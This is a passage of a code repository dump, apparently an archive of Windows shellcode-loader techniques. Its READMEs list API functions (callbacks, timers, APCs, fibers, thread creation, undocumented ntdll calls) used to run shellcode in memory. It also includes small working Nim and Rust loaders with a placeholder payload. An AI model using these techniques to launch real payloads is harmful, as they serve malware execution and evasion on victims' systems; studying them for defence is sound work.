18 | - [MSDN mciSendString](https://docs.microsoft.com/en-us/previous-versions//dd757161(v=vs.85)) -------------------------------------------------------------------------------- /windows/execution/callback/waveInOpen/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `waveInOpen`. 

```c++
MMRESULT waveInOpen(LPHWAVEIN phwi, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen);
```

### Reference

- [MSDN waveInOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveinopen)
- [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85))

--------------------------------------------------------------------------------
/windows/execution/callback/waveOutOpen/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callbacks to run shellcode.

### Overview

Executing shellcode with `waveOutOpen`.

```c++
MMRESULT waveOutOpen(LPHWAVEOUT phwo, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen);
```

### Reference

- [MSDN waveOutOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveoutopen)
- [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85))

--------------------------------------------------------------------------------
/windows/execution/event/CreateThreadpoolTimer/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode using a timer.

### Overview

Executing shellcode with `CreateThreadpoolTimer`.

A thread pool is a collection of worker threads that execute callbacks asynchronously.

```c++
PTP_TIMER CreateThreadpoolTimer(PTP_TIMER_CALLBACK pfnti, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);

void SetThreadpoolTimer(PTP_TIMER pti, PFILETIME pftDueTime, DWORD msPeriod, DWORD msWindowLength);

HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpooltimer)
- [MSDN SetThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpooltimer)
- [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/event/CreateThreadpoolWait/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with `CreateThreadpoolWait`.

A thread pool is a collection of worker threads that execute callbacks asynchronously.

```c++
PTP_WAIT CreateThreadpoolWait(PTP_WAIT_CALLBACK pfnwa, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);

void SetThreadpoolWait(PTP_WAIT pwa, HANDLE h, PFILETIME pftTimeout);

HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwait)
- [MSDN SetThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpoolwait)
- [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/event/CreateTimerQueueTimer/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode using a timer.

### Overview

Executing shellcode with `CreateTimerQueue` and `CreateTimerQueueTimer`.

A timer queue holds timer objects in a queue. A timer object is a lightweight object that can be used to invoke a callback at a specified time.

```c++
HANDLE CreateTimerQueue ();

BOOL CreateTimerQueueTimer(PHANDLE phNewTimer, HANDLE TimerQueue, WAITORTIMERCALLBACK Callback, PVOID Parameter, DWORD DueTime, DWORD Period, ULONG Flags);

HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateTimerQueue](https://docs.microsoft.com/en-us/windows/win32/api/threadpoollegacyapiset/nf-threadpoollegacyapiset-createtimerqueue)
- [MSDN CreateTimerQueueTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoollegacyapiset/nf-threadpoollegacyapiset-createtimerqueuetimer)
- [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/event/NtQueueApcThread/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode by queueing it as an APC (Asynchronous Procedure Call).

### Overview

Executing shellcode with `NtQueueApcThread`.

```c++
NTSTATUS NtQueueApcThread (HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext, PIO_STATUS_BLOCK ApcStatusBlock, ULONG ApcReserved);

NTSTATUS NtTestAlert();
```

### Reference

- [NTInternals NtQueueApcThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html)
- [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)
- [BLOG APC Series: User APC API Low Level Pleasure](https://repnz.github.io/posts/apc/user-apc/)

--------------------------------------------------------------------------------
/windows/execution/event/NtQueueApcThreadEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode by queueing it as an APC (Asynchronous Procedure Call).

### Overview

Executing shellcode with `NtQueueApcThreadEx`.

```c++
NTSTATUS NtQueueApcThreadEx (HANDLE ThreadHandle, USER_APC_OPTION UserApcOption, PPS_APC_ROUTINE ApcRoutine, PVOID SystemArgument1, PVOID SystemArgument2, PVOID SystemArgument3);

NTSTATUS NtTestAlert();
```

### Reference

- [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)
- [BLOG APC Series: User APC API](https://repnz.github.io/posts/apc/user-apc/)

--------------------------------------------------------------------------------
/windows/execution/event/QueueUserAPC/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode by queueing it as an APC (Asynchronous Procedure Call).

### Overview

Executing shellcode with `QueueUserAPC`.

```c++
DWORD QueueUserAPC(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData);

NTSTATUS NtTestAlert();
```

### Reference

- [MSDN QueueUserAPC](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc)
- [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)

--------------------------------------------------------------------------------
/windows/execution/event/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

### Overview

Executing shellcode triggered by a specific event.

--------------------------------------------------------------------------------
/windows/execution/event/RegisterWaitForSingleObject/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode using a timer.

### Overview

Executing shellcode with `RegisterWaitForSingleObject`.

```c++
BOOL RegisterWaitForSingleObject(PHANDLE phNewWaitObject, HANDLE hObject, WAITORTIMERCALLBACK Callback, PVOID Context, ULONG dwMilliseconds, ULONG dwFlags);

HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);

BOOL UnregisterWait(HANDLE WaitHandle);
```

### Reference

- [MSDN RegisterWaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-registerwaitforsingleobject)
- [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
- [MSDN UnregisterWait](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-unregisterwait)

--------------------------------------------------------------------------------
/windows/execution/event/SetTimer/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode using a timer.

### Overview

Executing shellcode with `SetTimer`.

```c++
UINT_PTR SetTimer (HWND hWnd, UINT_PTR nIDEvent, UINT uElapse, TIMERPROC lpTimerFunc);
```

### Reference

- [MSDN SetTimer](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-settimer)

--------------------------------------------------------------------------------
/windows/execution/event/timeSetEvent/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode using a timer.

### Overview

Executing shellcode with `timeSetEvent`.

This function is classified as obsolete.

```c++
MMRESULT timeSetEvent (UINT uDelay, UINT uResolution, LPTIMECALLBACK lpTimeProc, DWORD_PTR dwUser, UINT fuEvent);

MMRESULT timeKillEvent (UINT uTimerID);

MMRESULT timeBeginPeriod (UINT uPeriod);

MMRESULT timeGetDevCaps (LPTIMECAPS ptc, UINT cbtc);
```

### Reference

- [MSDN timeSetEvent](https://docs.microsoft.com/en-us/previous-versions//dd757634(v=vs.85))
- [MSDN timeKillEvent](https://docs.microsoft.com/en-us/previous-versions//dd757630(v=vs.85))
- [MSDN timeGetDevCaps](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timegetdevcaps)
- [MSDN timeBeginPeriod](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timebeginperiod)

--------------------------------------------------------------------------------
/windows/execution/exception/AddVectoredExceptionHandler/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing exceptions to run the shellcode.

### Overview

Executing shellcode through an exception handler registered with `AddVectoredExceptionHandler` and triggered with `RaiseException`.

```c++
PVOID AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);

void RaiseException (DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments);

ULONG RemoveVectoredExceptionHandler (PVOID Handle);
```

### Reference

- [MSDN AddVectoredExceptionHandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler)
- [MSDN RaiseException](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-raiseexception)
- [MSDN RemoveVectoredExceptionHandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-removevectoredexceptionhandler)

--------------------------------------------------------------------------------
/windows/execution/exception/SetUnhandledExceptionFilter/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing exceptions to run the shellcode.

### Overview

Executing shellcode through an exception filter registered with `SetUnhandledExceptionFilter` and triggered by any unhandled exception.

```c++
LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter (LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter);
```

### Reference

- [MSDN SetUnhandledExceptionFilter](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-setunhandledexceptionfilter)

--------------------------------------------------------------------------------
/windows/execution/exception/seh-catch-exception/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing exceptions to run the shellcode.

### Overview

Executing shellcode through an exception handler.

### Reference

--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiber/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a fiber.

### Overview

Executing shellcode with `CreateFiber`.

```c++
LPVOID CreateFiber(SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter);

LPVOID ConvertThreadToFiber(LPVOID lpParameter);
```

### Reference

- [MSDN CreateFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiber)
- [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber)

--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiber/rust/Cargo.toml:
--------------------------------------------------------------------------------

[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]

--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiberEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a fiber.

### Overview

Executing shellcode with `CreateFiberEx`.

```c++
LPVOID CreateFiberEx (SIZE_T dwStackCommitSize, SIZE_T dwStackReserveSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter);

LPVOID ConvertThreadToFiber(LPVOID lpParameter);
```

### Reference

- [MSDN CreateFiberEx](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiberex)
- [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber)

--------------------------------------------------------------------------------
/windows/execution/fiber/FlsAlloc/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a fiber.

### Overview

Executing shellcode with `FlsAlloc`.

`FlsAlloc` allocates a Fiber Local Storage (FLS) index, which can be used to store and retrieve data local to a fiber.

```c++
DWORD FlsAlloc (PFLS_CALLBACK_FUNCTION lpCallback);

BOOL FlsSetValue (DWORD dwFlsIndex, PVOID lpFlsData);
```

### Reference

- [MSDN FlsAlloc](https://docs.microsoft.com/fr-fr/windows/win32/api/fibersapi/nf-fibersapi-flsalloc)
- [MSDN FlsSetValue](https://docs.microsoft.com/en-us/windows/win32/api/fibersapi/nf-fibersapi-flssetvalue)

--------------------------------------------------------------------------------
/windows/execution/fiber/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

### Overview

Executing shellcode as a fiber.

A fiber is a cooperatively multitasked unit of execution. Like a thread, a fiber shares its memory space with the other threads/fibers in the same process.

In outline, the extracted shellcode is copied into an allocated memory region. The address of the shellcode then becomes the fiber's entry point function.

--------------------------------------------------------------------------------
/windows/execution/fiber/RtlUserFiberStart/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a fiber.

### Overview

Executing shellcode with `RtlUserFiberStart`.

`RtlUserFiberStart` is an internal, low-level function.

```c++
NTSTATUS RtlUserFiberStart();
```

### Reference

- [MSDN TEB (Thread Environment Block)](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-teb)
- [TEB](https://processhacker.sourceforge.io/doc/struct___t_e_b.html)
- [TEB32](https://processhacker.sourceforge.io/doc/struct___t_e_b32.html)
- [Wiki Thread Information Block](https://en.wikipedia.org/wiki/Win32_Thread_Information_Block)
- [NT_TIB](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20|%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB)
- [NT_TIB32](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB32)
- [MSDN NtCurrentTeb](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-ntcurrentteb)

--------------------------------------------------------------------------------
/windows/execution/invoke/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

### Overview

Executing shellcode by casting the shellcode buffer to a function/procedure pointer and calling it directly. The shellcode runs on the same thread as the caller.
--------------------------------------------------------------------------------
/windows/execution/invoke/nim/code.nim:
--------------------------------------------------------------------------------

#[
    Shellcode Loader
    Archive of Reversing.ID

    Executing shellcode by jumping to it.

    Compile:
        $ nim c code.nim

    Technique:
        - allocation: VirtualAlloc
        - writing: copyMem
        - permission: VirtualProtect
        - execution:
]#
import winim

when isMainModule:
    var old_protect: DWORD = 0

    # shellcode storage in stack
    var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3]

    # allocate memory buffer for payload as READ-WRITE (not executable)
    var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE)

    # copy payload to the buffer
    copyMem(runtime, unsafeAddr payload, payload.len)

    # make buffer executable (R-X)
    var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect)
    if retval != 0:
        let f = cast[proc(){.nimcall.}](runtime)
        f()

    # MEM_RELEASE requires dwSize to be 0; the whole region returned by VirtualAlloc is released
    VirtualFree(runtime, 0, MEM_RELEASE)

--------------------------------------------------------------------------------
/windows/execution/invoke/rust/with-mmap/Cargo.toml:
--------------------------------------------------------------------------------

[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
libc = "0.2.151"
mmap = "0.1.1"

--------------------------------------------------------------------------------
/windows/execution/invoke/rust/with-mmap/src/main.rs:
--------------------------------------------------------------------------------

/*
    Shellcode Loader
    Archive of Reversing.ID

    Storing payload in stack.

    Compile:
        $ cargo build

    Technique:
        - allocation: MemoryMap::new
        - permission:
        - execution: unsafe call to function pointer

    Note:
        - minimalistic code

    Dependencies:
        - mmap==0.1.0 -> allocate executable section
*/

extern crate mmap;

use std::{mem, ptr};
use mmap::{MapOption, MemoryMap};

fn main() {
    let opts = [
        MapOption::MapReadable,
        MapOption::MapWritable,
        MapOption::MapExecutable
    ];

    // shellcode storage in stack
    let payload: [u8; 4] = [ 0x90, 0x90, 0xCC, 0xC3 ];

    // allocate a memory buffer for payload
    let runtime = MemoryMap::new (payload.len(), &opts).unwrap();

    unsafe {
        // copy payload to the buffer
        ptr::copy (payload.as_ptr(), runtime.data(), payload.len());

        // execute the function
        mem::transmute::<_, fn()>(runtime.data())();
    }
}

--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with `CreateRemoteThread` and waiting for it to finish with `WaitForSingleObject`.

`CreateRemoteThread` is normally used to start a thread in a remote process, but the new thread can also run in the current process by passing `GetCurrentProcess()` as the `hProcess` handle.

```c++
HANDLE CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateRemoteThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/rust/with-winapi/Cargo.toml:
--------------------------------------------------------------------------------

[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]

--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/rust/with-windows-sys/Cargo.toml:
--------------------------------------------------------------------------------

[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies]
windows-sys = { version = "0.48.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_Diagnostics_Debug", "Win32_Security"] }

--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThreadEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with `CreateRemoteThreadEx` and waiting for it to finish with `WaitForSingleObject`.

`CreateRemoteThread` is normally used to start a thread in a remote process, but the new thread can also run in the current process by passing `GetCurrentProcess()` as the `hProcess` handle.

The difference between `CreateRemoteThread` and `CreateRemoteThreadEx` lies in the `lpThreadId` parameter, which allows the thread ID of the newly started thread to be obtained.

```c++
HANDLE CreateRemoteThreadEx (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, LPDWORD lpThreadId);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateRemoteThreadEx](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/thread/CreateThread/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with `CreateThread` and waiting for it to finish with `WaitForSingleObject`.

```c++
HANDLE CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/thread/CreateThread/rust/Cargo.toml:
--------------------------------------------------------------------------------

[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]

--------------------------------------------------------------------------------
/windows/execution/thread/CreateThreadpoolWork/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callbacks to run shellcode.

### Overview

Executing shellcode with `CreateThreadpoolWork`, `SubmitThreadpoolWork`, and `WaitForThreadpoolWorkCallbacks`.

```c++
PTP_WORK CreateThreadpoolWork(PTP_WORK_CALLBACK pfnwk, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);

void SubmitThreadpoolWork(PTP_WORK pwk);

void WaitForThreadpoolWorkCallbacks(PTP_WORK pwk, BOOL fCancelPendingCallbacks);
```

### Reference

- [MSDN CreateThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwork)
- [MSDN SubmitThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-submitthreadpoolwork)
- [MSDN WaitForThreadpoolWorkCallbacks](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-waitforthreadpoolworkcallbacks)

--------------------------------------------------------------------------------
/windows/execution/thread/EtwpCreateEtwThread/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with `EtwpCreateEtwThread` and waiting for it to finish with `WaitForSingleObject`.

`EtwpCreateEtwThread` is an internal, low-level function.

```c++
HANDLE EtwpCreateEtwThread (LPVOID routine, LPVOID param);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [NTInternals EtwpCreateEtwThread](https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
- [GIST TheWover](https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3)

--------------------------------------------------------------------------------
/windows/execution/thread/NtCreateThreadEx/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with `NtCreateThreadEx` and waiting for it to finish with `WaitForSingleObject`.

`NtCreateThreadEx` is an internal, low-level function.

```c++
NTSTATUS NtCreateThreadEx (PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG flags, SIZE_T szStackZeroBits, SIZE_T szStackCommitSize, SIZE_T szStackReserveSize, PVOID lpBytesBuffer);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [NTInternals NtCreateThreadEx](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/thread/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

### Overview

Executing shellcode as a separate thread that shares the process address space (threads within one process share memory). Windows provides several threading functions (public and internal) that can be used to start a thread.

In outline, the extracted shellcode is copied into an allocated memory region. The address of the shellcode then becomes the thread's entry point function.

--------------------------------------------------------------------------------
/windows/execution/thread/RtlCreateUserThread/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode with `RtlCreateUserThread` and waiting for it to finish with `WaitForSingleObject`.

`RtlCreateUserThread` is an internal, low-level function.

```c++
NTSTATUS RtlCreateUserThread (HANDLE ProcessHandle, PSECURITY_DESCRIPTOR SecurityDescriptor, BOOLEAN CreateSuspended, ULONG StackZeroBits, PULONG StackReserved, PULONG StackCommit, PVOID StartAddress, PVOID StartParameter, PHANDLE ThreadHandle, PCLIENT_ID ClientID);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [NTInternals RtlCreateUserThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FRtlCreateUserThread.html)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)

--------------------------------------------------------------------------------
/windows/execution/thread/SHCreateThread/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callbacks to run shellcode.

### Overview

Executing shellcode with `SHCreateThread`.

```c++
BOOL SHCreateThread (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback);
```

### Reference

- [MSDN SHCreateThread](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethread)

--------------------------------------------------------------------------------
/windows/execution/thread/SHCreateThreadWithHandle/README.md:
--------------------------------------------------------------------------------

# Shellcode Loader

Abusing callbacks to run shellcode.

### Overview

Executing shellcode with `SHCreateThreadWithHandle`.
8 | 9 | ```c++ 10 | BOOL SHCreateThreadWithHandle (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback, HANDLE * pHandle); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN SHCreateThreadWithHandle](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethreadwithhandle) -------------------------------------------------------------------------------- /windows/execution/thread/TpSimpleTryPost/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `TpSimpleTryPost`. 8 | 9 | `TpSimpleTryPost` adalah fungsi internal dan bersifat low-level. 10 | 11 | ```c++ 12 | NTSTATUS TpSimpleTryPost(PTP_SIMPLE_CALLBACK callback, PVOID args, PTP_CALLBACK_ENVIRON environ); 13 | ``` 14 | 15 | ### Reference 16 | -------------------------------------------------------------------------------- /windows/execution/thread/TrySubmitThreadpoolCallback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `TrySubmitThreadpoolCallback`. 8 | 9 | ```c++ 10 | BOOL TrySubmitThreadpoolCallback(PTP_SIMPLE_CALLBACK pfns, PVOID pv,PTP_CALLBACK_ENVIRON pcbe); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN TrySubmitThreadpoolCallback](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-trysubmitthreadpoolcallback) -------------------------------------------------------------------------------- /windows/execution/thread/tls-callback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 
